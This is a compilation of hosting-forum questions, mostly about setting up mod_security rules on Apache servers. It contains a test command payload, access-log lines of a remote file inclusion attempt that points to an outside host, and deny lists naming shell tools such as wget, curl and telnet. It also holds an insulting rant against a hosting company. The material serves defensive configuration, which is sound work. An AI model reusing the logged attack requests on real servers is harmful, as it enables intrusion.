Common Attack To Test Mod_security

Jul 22, 2008

I just installed mod_security and would like to test some common attacks to see if it's blocking them.

I tried passing "cmd=uname -a" as a parameter to a .php, but it didn't block it.
Any other tests I can try?

I'm using almost all rules from gotroot


C99Shell :: Attack Rules For Mod_security

Oct 3, 2007

I want to prevent c99shell scripts from running.

I found this rule to detect URIs for the c99 shell.

#new kit
SecFilterSelective REQUEST_URI "/c99shell.txt"
SecFilterSelective REQUEST_URI "/c99.txt?"
My problem is that the hackers are being more stealthy and calling the script some random name like .../myphpstuff.php. So the URI no longer helps detect it.

How could I detect "c99shell" in the actual file that Apache serves? This assumes that the hacker was successful in installing it.

My box:

Apache 1.3.37
WHM 11.2.0 cPanel 11.11.0-R16983
FEDORA 5 i686 - WHM X v3.1.0

Anybody Know How To Block This Specific PHP Inject Attack Using Mod_Security

Jun 17, 2008

How do I block the following "WEB-PHP remote include path" attack using mod_security?

I have tried using the default Mod_Security rules and also the Mod_Security rules from [url]

But it seems that mod_security is not functioning well, in that the PHP inject script is still able to run on my server.

The following is the WEB-PHP remote include path that I mentioned, taken from the Apache access log.

=================================

127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....

Why Is CentOS Most Common

May 20, 2009

Why do most VPS servers have CentOS as the default/most common OS for linux?

What Are The Common Scams

Jan 24, 2008

What are the common scams or abuse that beginning resellers need to be wary of? And how do you reduce exposure to these problems?

Common Managed Colocation

Nov 2, 2009

I am writing an article about managed colocation (what it is, what are the benefits, how is it different from other hosting options, etc.).

What are some common questions you get from your customers regarding your managed colocation or managed services?

Do they see the value right away? Why are they hesitant? Is it clear to them which aspects of their server are under the control of the hosting company and which are still their responsibility?

How Common Is Port 8080

Aug 6, 2007

I want to have a static server for my website which runs on the same machine as the dynamic server. I have read on the internet that port 8080 is a good alternative port to use.

Is it common enough that it will work in all cases like port 80? And will it not be blocked by firewalls and so on, since it's not a service port (port < 1024)?

Is It Common For Hosts To Provide Only 1 Db

Jul 9, 2007

Is it common for 10-15$+/month to provide only 1 database?

Most Common Hosting Platform

Jun 2, 2007

The most common hosting platform is Linux, correct?

Common ./configure Parameters For Apache And PHP

Oct 28, 2007

What are the ./configure parameters commonly used for Apache (2.2) and PHP (5.2) installations on web hosting servers?

Yum Error: Glibc-common Dependency

Sep 9, 2007

After installing yum on my CentOS 4.4 VPS, I ran yum update and got this error:

Error: Missing Dependency: glibc-common = 2.3.4-2.25 is needed by package glibc-dummy-centos-4

When I tried to install glibc-common, I got this error:

error: Failed dependencies:
glibc-common = 2.3.4-2.25 is needed by (installed) glibc-2.3.4-2.25.i686
glibc-common = 2.3.4-2.25 is needed by (installed) glibc-dummy-centos-4-2.3.4-2.25.swsoft.i386

When trying to install these other things, I get more dependency errors. I noticed that glibc-dummy-centos-4-2.3.4-2.25.swsoft.i386 was mentioned. I'm not sure what this is, but is it by SWsoft? Is this something I have to contact my provider about? Thanks.

What Are Common MySQL User Permissions

Jun 29, 2007

I want to use something like phpBB forums using one MySQL user and database. Just wondering, what are the common user permissions I should set for the user? I want to try to minimize any permissions that can cause a big risk to the server's security.

Here is a full list of permissions I can grant to the user (via Webmin):

-Select table data
-Insert table data
-Update table data
-Delete table data
-Create tables
-Drop tables
-Grant privileges
-Reference operations
-Manage indexes
-Alter tables
-Create temp tables
-Lock tables

Is Data Theft Common In Dedicated Industry

Apr 10, 2008

Is data theft common in the dedicated industry? Such as source code theft, especially in a fully managed hosting situation?

MySQL's Error Code 28: What Are Its Common Causes And Other Pertinent

Nov 22, 2008

This is part 1 of a personal tragic-comic narrative starring myself, a simple, unassuming end-user of value-based web hosting services, and the supreme villain of this pathetic tale, the Iago to my Othello, would be a verminous, sub-human parasite collective disguised as a professional web-hosting company in the vicinity of Columbus, Ohio.

Speaking of Shakespeare, it seems to this humble WHT supplicant that the comedy of errors authored by the entities in question, a craven crew of possum-bellied, pigeon-brained menagerie of cubicle-dwelling subhuman troglodytes masquerading as ethical business-persons and capable hosting providers, is so egregious that if a scale of measurement is ever devised for web-hosting incompetence, it should be named after this company, in recognition of their utter incompetence and arbitrary imbecilic buffoonery disguised as reasonable technical support and customer service.

Apparently this company thinks it's more important to use their scale-encrusted rat-tails to cover up their own mistakes instead of giving reasonable responses to customer questions regarding apparent server issues.

Which brings me to my initial question:

MySQL's docs say that Error Code 28 results from lack of disk space or write permissions.

What are the common causes of this? Who has the power to control it from happening, the web host or the end user? (In this arrangement, the host is running an overloaded server and controls all of the configurations and aspects of the server, while the user is using secure software with moderate usage of bandwidth and database queries.)

I have additional questions in regards to a more general issue regarding failure to write/open to directories as well, but I'll wait for some responses first.

Excellent forum, by the way.

Apache :: Basic Auth User Not Logged In Common Log File

Jul 18, 2013

I use Basic Auth to limit access to a web site. This seems to work OK. I noticed, though, in the logs that the logged-in user is not logged:

80.....188 - - [16/Jul/2013:09:56:29 +0200] "GET ..." 200 1844 "...." " ...

I would expect the second "-" to be replaced by the logged-in user. The doc says the user is logged if the document is protected. I do protect the whole directory using DirectoryMatch. Without logging in, I fail to retrieve the document in question.

Mod_Security 2.5, Or 2.0?

Apr 21, 2008

I have been using mod_security 1.9.x since its first release on Apache 1.3 and Apache 2.0.x; the rules are great and they work perfectly with no issues at all with any PHP/MySQL website. Do you recommend using mod_security 2.0 or 2.5? (I do know that 2.5 does not work with Apache 1.3.)

Mod_security Won't Log Anything

Apr 19, 2008

I'm new to using mod_security, but I believe that I have it installed correctly with some rules that should be generating entries in the security audit log. No matter what I do, I can't seem to get mod_security to generate any sort of log entries.

I am using version 2.1.7. I compiled it with no problems. In my httpd.conf file, I have the following relevant lines:

LoadFile /usr/lib/libxml2.so
LoadModule security2_module modules/mod_security2.so
Include conf/modsecurity/*.conf

I don't think there are any problems here, as I know it is running directives from the configuration file I edited. This is the file I'm working with:

modsecurity_crs_10_config.conf

Here are the relevant lines from the config file:

SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess On
SecResponseBodyMimeType (null) text/html text/plain text/xml
SecResponseBodyLimit 524288
SecDefaultAction "phase:2,auditlog,log,pass,status:500"
SecAuditEngine On
SecAuditLogType Serial
SecAuditLog logs/modsec_audit.log
SecAuditLogParts "ABIFHZ"
SecRequestBodyInMemoryLimit 131072
SecDebugLog logs/modsec_debug.log
SecDebugLogLevel 3

I know that the config file is being read because when I start apache, the log files (modsec_audit.log and modsec_debug.log) are created. The problem is that the files are empty and remain empty no matter what I do. I have even tried setting permissions on the files to 777.

Here are a couple of rules I created in an attempt to generate log entries:

SecRule REQUEST_BODY "viagra"
SecRule REMOTE_ADDR "^1\.2\.3\.4$" "auditlog,phase:1,allow"

I put these in the same config file mentioned above. As far as I understand, the first rule should examine the request body (which would include data in POST requests) for the word, "viagra". Since my default action is phase:2,auditlog,log,pass,status:500, such requests should end up in the audit log. However, when I use a form on my site to post the word "viagra", nothing is generated in the log file.

The second rule, as far as I understand, should generate a log entry any time the IP address 1.2.3.4 is sent in the request headers. Instead of 1.2.3.4, of course, I have put in my real IP address. However, when I visit my server and browse pages, nothing is logged. I assume that my requests should generate log entries since I match the IP address.

Mod_security

Dec 1, 2007

I am currently running a few small websites that use a CMS. Two are Dragonfly and one is Joomla.

I am getting sporadic errors with both systems that, upon research, seem to be related to Apache and the mod_security module. I am getting the following error:

Code:
Not Acceptable

An appropriate representation of the requested resource /somefolder/index.php could not be found on this server.

Well, I'm no idiot (although some people may tend to disagree) and after some searching, I found that this most likely points to an Apache error. Most solutions suggest putting the following in my .htaccess file for the site:

Code:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

It was noted that "SecFilterScanPOST Off" may or may not be necessary. I have added the above to the .htaccess for each site (all 3 sites are subdomains) and have also added it to the .htaccess that is in the root folder for the site. Nothing has worked.

So my question is: is it possible that my web host can override my .htaccess settings with their own? This is the only explanation that I can think of. But of course, I am no expert, which is why I turn to you good folks for help once again.

Mod_security

Jul 27, 2008

I want to add some more rules to mod_security; however, I am unsure if some of them are already being used.

So would it cause any problems if there are duplicate rules for the time being, until I can check through all the rules?

Mod_security On RH 5 64

Jul 23, 2007

I am having lots of problems installing mod_security on RH5 64-bit with Plesk,

mainly related to apr0, subversion, and the headers.

Any reason why everyone recommends using version 1.94 of mod_security rather than the latest version available on www.modsecurity.org?

Mod_security

Oct 2, 2007

I've got this:

mod_security: Access denied with code 406. Error normalising REQUEST_URI: Invalid URL encoding detected: invalid characters used [hostname "www.mydomain.com"] [uri "/search/include/js_suggest/suggest.php?type=query&q=%u062E%u0636%u0631%u0627"]

How do I disable/exclude this URI on the mentioned host from being caught by mod_security?

Mod_security 1 Or 2 - What Do You Use?

Mar 29, 2007

How many people are actually using mod_security 2 instead of 1?

And why did you choose the version you did?

Mod_security & C99shell Anyone Help Please ?

Jun 5, 2007

I installed modsecurity from the Addon Modules in cPanel.

When I try running a PHP shell it works fine without any errors, and I can do anything despite the presence of modsecurity protection and disable_functions in php.ini.

Are there particular settings to add to httpd.conf to prevent running a PHP shell or to prevent uploading it to the site?

Mod_security And Mod_filter

May 11, 2009

I tried using mod_security and mod_filter together. However, when I try to filter .js files, I notice that certain pages stop working, especially those using Ajax.

Mod_Security Configuration

Jul 24, 2009

I installed Mod_Security on my CentOS server today and am having some problems configuring it.

Problem -

I have added this module in 'httpd.conf' file

Code:
<IfModule mod_security.c>
SecFilterEngine On

SecServerSignature "Apache"
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterScanPOST On

SecFilterDefaultAction "deny,log,status:403"

SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

SecFilterSelective HTTP_Transfer-Encoding "!^$"

SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
SecFilter "../"

SecFilter "viewtopic.php?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
SecFilterSelective THE_REQUEST "/../../ "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "

# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"

# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"

# Prevent XSS attacks (HTML/Javascript injection)
SecFilter "<(.|\n)+>"
</IfModule>

But my website is multi-forum hosting and requires the 'index.php' file to be passed parameters to make it work.

Example -

[url]
[url]
[url]

So I had to delete the code below from the above module.

Code:
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

SecFilterSelective HTTP_Transfer-Encoding "!^$"

SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
SecFilter "../"

Mod_security Rules

May 25, 2009

Is it possible to disable a particular mod_security rule for a particular directory, or are the rules global?

Mod_security Rules In WHM

Aug 15, 2008

I just installed mod_security via WHM, and want to know what rule I should enter to prevent some URLs from being opened.

For example, if the URL contains the word "abc" (like domain.com/some_folder/abc/file.php), it should not be opened.

Mod_security And ISPConfig3

May 20, 2009

I have installed a new server with Debian Lenny 5, ISPConfig 3.0.1.1 and the newest mod_security, and implemented the default rules.

I deactivated the rule detecting an IP in page headers.

Then I got another problem. Some actions of ISPConfig are detected as "remote file access attempt", severity "critical", tag "web attack/file injection", data "/etc/"

detected by rule file crs_40 line 114, id 950005.

Question: how do I authorize ISPConfig, and only ISPConfig, to perform such requests on the server?

How To Set The Rules Of MOD_Security

Jun 4, 2008

How do I set the rules of MOD_Security?

Another question for professionals:

Q: What are the best rules to secure my server? I'd appreciate if you managed to attach these rules to your replies. // FYI, I host VBulletin portals.

Mod_Security - Using RBLs

Dec 24, 2008

Trying to use an RBL with ModSecurity, but this matches everything, whether listed or not:

SecRule REMOTE_ADDR "@rbl bb.barracudacentral.org" "log,deny,msg:'POST RBL Comment Spammer'"

What I would like to do is an RBL lookup on any POST operations.

Mod_security 2 Rules

Feb 25, 2008

How do I make these rules work on Apache 2 with mod_security 2?

Copyrights 2005-15 www.BigResource.com, All rights reserved